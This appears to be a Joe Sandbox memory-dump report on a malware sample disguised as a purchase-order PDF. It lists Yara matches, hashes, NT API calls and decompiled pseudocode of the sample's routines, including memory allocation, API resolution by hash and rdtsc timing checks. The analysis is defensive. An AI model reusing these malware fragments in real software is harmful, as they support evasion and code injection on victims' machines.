Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A34A Relevance: 1.5, APIs: 1, Instructions: 43
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 818b422ccb0000964566d4876d744815bf22fa1e8f54c71bbdefc3f6f336a5e1
Instruction ID: cf7193a71b00961e0141ea223290413cfb76118b5e48c92630641ef23e37ae04
Opcode Fuzzy Hash: 818b422ccb0000964566d4876d744815bf22fa1e8f54c71bbdefc3f6f336a5e1
Instruction Fuzzy Hash: 6701E4B2201209ABCB08CF88CC84EEB77ADAF8C754F058248BA1C97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A52A Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0041A52A(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				asm("psllq mm0, [ebx-0x74aa1173]");
				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E0041AF50(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}

0x0041a52b
0x0041a533
0x0041a53f
0x0041a547
0x0041a569
0x0041a56d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: abdeab3458a3dbef633e62a5ac37ab1a97033ba4cbeccd0945172c5857026075
Instruction ID: 7d27550bdcb24b2082353e2a18e0f7b5d120b3146cde2dc8be2183a3ca8ef098
Opcode Fuzzy Hash: abdeab3458a3dbef633e62a5ac37ab1a97033ba4cbeccd0945172c5857026075
Instruction Fuzzy Hash: 8AF01CB1210118AFDB14DF99CC85EEB77A9FF88354F158159FA1CE7241C634E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a53f
0x0041a547
0x0041a569
0x0041a56d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A47A Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041A47A(void* __edx, signed int __esi, intOrPtr _a8, void* _a12) {
				long _t9;
				void* _t13;
				signed int _t15;

				_pop(es);
				_t15 = __esi &  *(__edx + 0x555ac790);
				_t6 = _a8;
				_t3 = _t6 + 0x10; // 0x300
				_push(_t15);
				_t4 = _t6 + 0xc50; // 0x40a933
				E0041AF50(_t13, _a8, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a12); // executed
				return _t9;
			}

0x0041a47a
0x0041a47b
0x0041a483
0x0041a486
0x0041a489
0x0041a48f
0x0041a497
0x0041a4a5
0x0041a4a9

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6d9e8884b500a25ec1b5bae155ff1940984e34dfa630c68516462ab8a61ce810
Instruction ID: 79537816c5b915e3fd35928aba6fa7cf3fef344b98ef69cddc457634b8b97058
Opcode Fuzzy Hash: 6d9e8884b500a25ec1b5bae155ff1940984e34dfa630c68516462ab8a61ce810
Instruction Fuzzy Hash: 7CE08C76600210ABD710EB94CC45EE77768EF48324F094099FE1C6B242C230FA008AD0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A480(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a933
				E0041AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a483
0x0041a486
0x0041a48f
0x0041a497
0x0041a4a5
0x0041a4a9

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4

Uniqueness

Uniqueness Score: -1.00%

Function 00A62CE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62CEA

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3d96ecf6fbc9807dcb91923fca778aad4e4aea418462eca6bb42c7770c8a0e95
Instruction ID: 262d09853697b5974be883e86311f2aaa1372d81c54dc401064dc2e9c4228ed6
Opcode Fuzzy Hash: 3d96ecf6fbc9807dcb91923fca778aad4e4aea418462eca6bb42c7770c8a0e95
Instruction Fuzzy Hash: F390023125104413D21561584908707000D87D0382FA1C422A0865598DDA5A8952A122

Uniqueness

Uniqueness Score: -1.00%

Function 00A62CC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62CCA

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62bec6f5f39ed37fb9855392ec95ec4755c46d61776f0d5c4f6289fe6a1901b0
Instruction ID: c58a916ac049da0b08c0632646f2beb446ab9d934fc9b0b4a551c778c90aeac2
Opcode Fuzzy Hash: 62bec6f5f39ed37fb9855392ec95ec4755c46d61776f0d5c4f6289fe6a1901b0
Instruction Fuzzy Hash: 82900221292081525649B1584808507400A97E03827A1C022A1855990CC92A9856D622

Uniqueness

Uniqueness Score: -1.00%

Function 00A62C20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62C2A

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d2773d342058afb98ac1e53d33e7b72b2beafff8e6fae3137c437dd7832644d
Instruction ID: 95208c9815fa834e517dae4c727731e62ac7b2e85cba835ea93c5b91172b7ddb
Opcode Fuzzy Hash: 9d2773d342058afb98ac1e53d33e7b72b2beafff8e6fae3137c437dd7832644d
Instruction Fuzzy Hash: BB90022135104003D2447158581C6074009D7E1342F61D021E0855594CDD1988565223

Uniqueness

Uniqueness Score: -1.00%

Function 00A62C00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62C0A

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf7c72e591372d9acebc874720158b168cd8f83085491b1817c084dde421417e
Instruction ID: 623ab8732427036cc8a40703d53f90e4386045ca223e8a08f7b557d77c994f92
Opcode Fuzzy Hash: cf7c72e591372d9acebc874720158b168cd8f83085491b1817c084dde421417e
Instruction Fuzzy Hash: 8F90022926304002D2847158580C60B000987D1343FA1D425A0456598CCD1988695322

Uniqueness

Uniqueness Score: -1.00%

Function 00A62D90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62D9A

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 70e3d1ae4841199edbe3daa64515305e3f85d3d5946df46153c3d074aa7288d6
Instruction ID: 2561abf2c16f0a24ebf54908566cc6946983130ad6cf5c1f4d53b54ad29a55b1
Opcode Fuzzy Hash: 70e3d1ae4841199edbe3daa64515305e3f85d3d5946df46153c3d074aa7288d6
Instruction Fuzzy Hash: 3090027125104402D24471584808747000987D0342F61C021A54A5594ECA5D8DD56666

Uniqueness

Uniqueness Score: -1.00%

Function 00A629C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A629CA

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 53614d389a4b0e734c1ef8e78f1d8f0e5a05ac5ecd7c67f4bfbae246ffd58007
Instruction ID: 6a8e12ea0998af67df7d92956d9e4e8e2a82d325a8ef63db8223640feddd8ad4
Opcode Fuzzy Hash: 53614d389a4b0e734c1ef8e78f1d8f0e5a05ac5ecd7c67f4bfbae246ffd58007
Instruction Fuzzy Hash: 28900225261040030209A5580B08507004A87D5392361C031F1456590CDA2588615122

Uniqueness

Uniqueness Score: -1.00%

Function 00A62D70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62D7A

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 86510f683e50026f2ff427f909fa622982ff60a71d73bb92077b10fa80f5433b
Instruction ID: d0664938b4b627610867cda98381a5c3fbd4d7db6088264243ce772cf2594d93
Opcode Fuzzy Hash: 86510f683e50026f2ff427f909fa622982ff60a71d73bb92077b10fa80f5433b
Instruction Fuzzy Hash: C890022165104502D20571584808617000E87D0382FA1C032A1465595ECE298992A132

Uniqueness

Uniqueness Score: -1.00%

Function 00A62EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62EAA

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1f0163112e5d970ca899194931b0e21bb99f4700473826adffa5ab2a1ea4801
Instruction ID: 68635cf6194e5a819bc7f27dae6e55a8233d9771f7e6f348fcc57e7758f432f2
Opcode Fuzzy Hash: e1f0163112e5d970ca899194931b0e21bb99f4700473826adffa5ab2a1ea4801
Instruction Fuzzy Hash: 4A90022165104042424471688C489074009ABE1352761C131A0DD9590DC95D88655666

Uniqueness

Uniqueness Score: -1.00%

Function 00A62E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62E8A

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31210f9c7a10b3683191062bfa2d28d6fb57653974a9a52ff4c81106abfe88c5
Instruction ID: 498febdde1122b397a49238a05d2497e5376e8e3d6bcc96a027ab40b41854676
Opcode Fuzzy Hash: 31210f9c7a10b3683191062bfa2d28d6fb57653974a9a52ff4c81106abfe88c5
Instruction Fuzzy Hash: 1E90023125144402D20461584C1870B000987D0343F61C021A15A5595DCA2988516572

Uniqueness

Uniqueness Score: -1.00%

Function 00A62AE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62AEA

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99d167ccd00724acd3d34bef698ee361e6ab6eb0634e1fa171383a10b6b2fd07
Instruction ID: 2f364eae17833b2dd3cdb2e37641a1775909623be32f660889babfdf6e876f3a
Opcode Fuzzy Hash: 99d167ccd00724acd3d34bef698ee361e6ab6eb0634e1fa171383a10b6b2fd07
Instruction Fuzzy Hash: 0690023125104802D2847158480864B000987D1342FA1C025A0466694DCE198A5977A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A62ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62EDA

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46b7449ba4c251d26737b771e2a35cb1b431c1198fc4e28ec2a6d8299b30a67b
Instruction ID: f3795e0b5768f6ac5d3145dce9a871b5afde236f78cf2999a0f5cd10cbae0759
Opcode Fuzzy Hash: 46b7449ba4c251d26737b771e2a35cb1b431c1198fc4e28ec2a6d8299b30a67b
Instruction Fuzzy Hash: 3090022126184042D30465684C18B07000987D0343F61C125A0595594CCD1988615522

Uniqueness

Uniqueness Score: -1.00%

Function 00A62E20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62E2A

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d394094bdfa34294f6a2c26ddb720c25c8b06abe93bee2d098a83d3bd61e8121
Instruction ID: 6fc14dbc90c4fe56b43d290e101e9762b2200033b524e88ecc48df5c0d7c318e
Opcode Fuzzy Hash: d394094bdfa34294f6a2c26ddb720c25c8b06abe93bee2d098a83d3bd61e8121
Instruction Fuzzy Hash: 8290026139104442D20461584818B070009C7E1342F61C025E14A5594DCA1DCC526127

Uniqueness

Uniqueness Score: -1.00%

Function 00A62A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62A5A

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 40f49c72e8006d61ae37bc3eea12ddcb47b4ffe9d5e554af899eac628bfcbee8
Instruction ID: 25810509e9bee23a37bdac82cd78f3f586801eef3d5b752733dbc0c67b34b447
Opcode Fuzzy Hash: 40f49c72e8006d61ae37bc3eea12ddcb47b4ffe9d5e554af899eac628bfcbee8
Instruction Fuzzy Hash: A890026125204003420971584818617400E87E0342B61C031E14555D0DC92988916126

Uniqueness

Uniqueness Score: -1.00%

Function 00A62B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62B9A

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1c24fab8fe54bc1e9c0f25e8eb5eedbca7bb5e161a239450d70bf9c3dcbb37c
Instruction ID: 29fe1e1d0f598959f7263f29babfc57dc4f4df6fe7c762a066be2ed0110f281b
Opcode Fuzzy Hash: f1c24fab8fe54bc1e9c0f25e8eb5eedbca7bb5e161a239450d70bf9c3dcbb37c
Instruction Fuzzy Hash: B690023125104402D2046598580C647000987E0342F61D021A5465595ECA6988916132

Uniqueness

Uniqueness Score: -1.00%

Function 00A62B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A62B6A

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ca6555834069b172dce0070f41e0a5edb83f360f4b46bddfd53bb9a0b22b9b0
Instruction ID: 521415ceea66b936c9568cf4473f56a6041ff9ceaae557320d45aa8a43abb6b8
Opcode Fuzzy Hash: 1ca6555834069b172dce0070f41e0a5edb83f360f4b46bddfd53bb9a0b22b9b0
Instruction Fuzzy Hash: 689002312510C802D2146158880874B000987D0342F65C421A4865698DCA9988917122

Uniqueness

Uniqueness Score: -1.00%

Function 00409AA0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409AA0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE00( &_v284, 0x104);
						E0041C470( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409aab
0x00409ab3
0x00409ab5
0x00409aba
0x00409abf
0x00409ad2
0x00409ad7
0x00409ae0
0x00409aec
0x00409aff
0x00409b04
0x00409b07
0x00409b10
0x00409b22
0x00409b27
0x00409b2c
0x00000000
0x00000000
0x00409b2e
0x00409b32
0x00000000
0x00000000
0x00409b34
0x00000000
0x00409b32
0x00409b36
0x00409b39
0x00409b3f
0x00409b41
0x00409b4c
0x00409b51
0x00409b54
0x00409b61
0x00409b6c
0x00409b6e
0x00409b74
0x00409b78
0x00409b7b
0x00409b7b
0x00409b82
0x00409b85
0x00409b8a
0x00409b97
0x00409ac6
0x00409ac6
0x00409ac6

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A620(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF50(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x0041a637
0x0041a642
0x0041a64d
0x0041a651

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D

Strings

&EA, xrefs: 0041A642, 0041A64C

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

Uniqueness

Uniqueness Score: -1.00%

Function 00408309 Relevance: 1.6, APIs: 1, Instructions: 58
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00408309(intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				long _t21;
				int _t26;
				void* _t29;
				void* _t31;
				void* _t36;

				asm("cld");
				asm("daa");
				asm("ror byte [edx+0x55], cl");
				_t29 = _t31;
				_v68 = 0;
				E0041BE50( &_v67, 0, 0x3f);
				E0041C9F0( &_v68, 3);
				_t12 = E0040ACE0(_t36, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t21 = _a8;
					_t13 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t38 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t26(_t21, 0x8003, _t29 + (E0040A470(_t38, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}

0x0040830b
0x0040830c
0x0040830e
0x00408311
0x0040831f
0x00408323
0x0040832e
0x0040833e
0x0040834e
0x00408353
0x0040835a
